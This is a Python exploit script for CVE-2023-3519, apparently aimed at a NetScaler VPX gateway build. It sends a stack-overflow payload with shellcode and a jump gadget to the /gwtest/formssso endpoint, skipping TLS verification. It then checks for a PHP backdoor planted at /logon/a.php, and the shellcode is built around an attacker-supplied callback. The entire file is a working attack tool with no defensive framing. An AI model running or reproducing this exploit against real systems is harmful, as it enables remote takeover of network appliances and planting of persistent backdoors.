cve-2023-3519.py

import socket, ssl, sys, struct, requests, urllib3
from mkshellcode import mkshellcode
urllib3.disable_warnings()

# VPX 13.1-48.47
RETURN_OFFSET=0xa8
JMP_STACK=0x02778c04
FIXUP="0xc7f78d"
RBP_FIXUP="0x30"

def pad(dat, l, c):
    return dat+(c*(l-len(dat)))

def url_encode(data):
    out=b''
    for i in data:
        if i>0x9f: out+=bytes([i])
        else: out+='%{:02x}'.format(i).encode()
    return out

def make_request(host, payload):
    ctx=ssl.create_default_context()
    ctx.check_hostname=False
    ctx.verify_mode=ssl.CERT_NONE
    s=socket.create_connection(host)
    ssock=ctx.wrap_socket(s)
    data=url_encode(payload)
    req =b"GET /gwtest/formssso?event=start&target="+data+b" HTTP/1.0\r\n"
    req+= "Host: {}:{}\r\n\r\n".format(host[0], host[1]).encode()
    ssock.sendall(req)

def main(host, shellcode):
    assert len(shellcode)<=RETURN_OFFSET-32, "payload is too long. Try a shorter URL"

    payload=pad(shellcode, RETURN_OFFSET, b'\xcc')
    payload+=struct.pack("<Q", JMP_STACK)
    payload+=b'\xe9'+struct.pack("<i", -(RETURN_OFFSET+8+5)) # jmp to start of shellcode

    print("Sending payload...")
    make_request(host, payload)

    r=requests.get("https://{}:{}/logon/a.php".format(host[0], host[1]), verify=False)
    if r.status_code==200:
        print(r.text)
        print("Done!")
    else:
        print("Failed to access PHP backdoor")
        print(r.status_code)
        print(r.text)

if __name__=="__main__":
    if len(sys.argv)<3:
        print("Usage: cve-2023-3519.py <host> <port> <callback>")
        exit()

    host=(sys.argv[1], int(sys.argv[2]))
    shellcode=mkshellcode(RBP_FIXUP, FIXUP, sys.argv[3])
    main(host, shellcode)